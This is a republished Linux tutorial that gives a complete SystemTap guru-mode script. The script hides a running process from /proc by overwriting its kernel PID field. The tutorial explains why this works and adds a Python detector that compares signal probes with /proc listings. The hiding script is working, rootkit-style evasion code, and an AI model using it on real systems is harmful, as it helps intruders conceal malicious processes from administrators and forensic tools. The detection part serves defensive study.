How to Hide a Linux Process with a One‑Line SystemTap Script

This guide shows a quick user‑space technique to conceal a Linux process by overwriting its PID with an unused value using a short SystemTap script. It includes the exact code, execution steps, detection method, and a brief explanation of why it works.

Liangxu Linux

Linux users often ask how to hide a process; this article presents a minimal user‑space method that works by changing the process's PID to an unused value. The key line:

target->pid = 0x7fffffff;

Complete SystemTap script (hide.stp):

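#!/usr/bin/stap -g
# hide.stp
# Guru mode (-g) is required because the function body is embedded C.

global pid;

function hide(who:long)
%{
    struct task_struct *target;

    /* Look up the task that owns the PID passed on the command line. */
    target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
    /* Overwrite the PID field; skip the write if no such PID exists. */
    if (target)
        target->pid = 0x7fffffff;
%}

probe begin
{
    pid = $1
    hide(pid);
    exit();
}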

Run a dummy program and the script to see the effect:

[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp 403
[root@localhost system]#

Detect all visible processes by scanning the /proc filesystem:

# List the executable behind every numeric (PID) entry that /proc exposes.
for pid in $(ls /proc | awk '/^[0-9]+$/{print $1}'); do
    ls -l /proc/$pid/exe;
done

When a task is created, its PID is used to register a procfs entry; procfs displays entries by traversing the task list using the PID as a key. Assigning a PID such as 0x7fffffff, which has never been registered, prevents any procfs entry from being created, so the process no longer appears in listings.

Task creation registers a procfs directory based on its PID.

procfs displays directories by iterating over the task list and using the PID as the lookup key.

An unused PID (e.g., 0x7fffffff) has no associated procfs entry, making the process invisible.
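Since the script only affects what a /proc listing shows, a defender can compare that listing against a second view of the PID space. The following is an added example, not code from the original article: it flags IDs that answer a signal-0 probe but are missing from /proc, on the assumption that the kernel still resolves the original PID number after task->pid is overwritten. The function names are illustrative.

```python
"""Cross-view check: IDs that are alive but missing from /proc listings.
Assumption: a hidden task still answers kill(pid, 0) under its original PID."""
import os


def listed_ids(proc_root="/proc"):
    """Every PID and thread ID that a directory listing of procfs exposes."""
    ids = set()
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        ids.add(int(name))
        try:
            # Thread IDs appear only under <pid>/task, never at the top level.
            tids = os.listdir(os.path.join(proc_root, name, "task"))
        except OSError:
            continue  # process exited while we were reading
        ids.update(int(t) for t in tids if t.isdigit())
    return ids


def pid_alive(pid):
    """Signal 0 delivers nothing; it only asks the kernel whether pid exists."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # exists, but owned by another user
    return True


def find_hidden(max_pid, probe=pid_alive, lister=listed_ids):
    """Return IDs that answer the probe but are absent from two listings."""
    before = lister()
    suspects = [p for p in range(1, max_pid + 1)
                if p not in before and probe(p)]
    # A second listing and probe drop processes that started or exited mid-sweep.
    after = lister()
    return [p for p in suspects if p not in after and probe(p)]


if __name__ == "__main__":
    with open("/proc/sys/kernel/pid_max") as fh:
        limit = int(fh.read())
    for pid in find_hidden(limit):
        print(f"PID {pid} answers kill(pid, 0) but is not listed in /proc")
```

Run it as root so the listing covers every process. A short-lived process can still slip through the race window, so treat a hit as a lead to confirm by repeating the sweep.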

The technique is a lightweight prank for advanced engineers and is not intended for serious anti‑forensic or defensive measures.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
